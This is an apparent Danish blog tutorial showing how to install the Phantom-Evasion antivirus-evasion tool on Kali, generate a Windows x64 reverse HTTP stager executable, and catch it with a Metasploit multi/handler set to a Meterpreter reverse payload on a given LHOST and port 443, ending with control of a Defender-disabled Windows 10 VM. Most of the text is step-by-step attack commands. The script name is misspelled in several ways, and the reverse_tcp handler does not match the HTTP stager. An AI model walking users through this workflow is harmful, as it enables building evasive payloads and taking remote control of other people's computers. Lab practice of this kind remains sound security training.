Phantom Evasion

Download and installation

Åben en terminal I Kali og skriv:

git clone https://github.com/oddcod3/Phantom-Evasion

Git clone

Skriv: cd Phantom-Evasion for at tilgå folderen. Skriv ls for at se indhold i folderen

Tilgå folder

Automatisk opsætning/installation skriv: python2 panthom-evasion –setup

Installation

Når installationen er færdig, skriv: python3 panthom-evasion.py eller ./pythom-evasion.py

Start phantom evasion

Menuen ser sådan ud.

Pythom evasion menu

Brug af Phantom Evasion

Der er rigtig mange forskellige muligheder til at lave payloads. Jeg vil gennemgå hvordan man laver en Windows x64 http Stager.

Vælg 1

Vælg Windows modules.

Vælg 3

Windows reverse HTTP stager.

Følg min konfiguration, der hvor der ikke står noget har jeg trykket Enter. Læg mærker til at jeg ikke bruger certifikat (rød firkant), da den ikke virker.

Konfiguration af HTTP stager.

Afslutning af konfiguration.

Når genereringen af koden er færdig, vil menuen vises, tryk 0 for exit. Skriv ls nu kan du se test.exe filen som er blevet genereret.

Show files

Start en ny terminal og skriv: msfconsole. Når msfconsole er startet skriv: use multi/handler

msf console

Skriv: show options

Options for multi handler

Skriv: set payload windows/x64/meterpreter/reverse_tcp

Skriv: set LHOST 192.168.1.82 (Den IP adresse vi skrev i phantom evasion)

Skriv: set LPORT 443 (Den port vi skrev i phantom evasion)

Skriv: show options Skriv: run –j (Køre i baggrunden)

Start i baggrunden

Nu skal vi kopier test.exe til en virtual Windows 10 hvor Defender er disbaled. Kør test.exe, kort efter kan du se i msf konsollen en Meterpreter session er åbnet. Wupti nu har vi overtaget Windows maskinen.

Meterpreter session åbnet

Comments

2 responses to “Phantom Evasion”

  1. Ashraff Ali

    When I originally commented I appear to have clicked
    the -Notify me when new comments are added- checkbox
    and from now on every time a comment is added I get 4 emails with the same comment.

    Perhaps there is an easy method you are able to remove me from
    that service? Thank you!

    Reply
    1. Admin

      I don’t use this options on the website. Your are welcome to send me some screenshots.

      Reply

Your email address will not be published. Website link will be deleted. We are glad you have chosen to leave a comment. Please keep in mind that all comments are moderated ccording to our privacy policy. Do NOT use keywords in the name field. Let us have a personal and meaningful conversation.

Leave a Reply

Your email address will not be published. Required fields are marked *

Translate »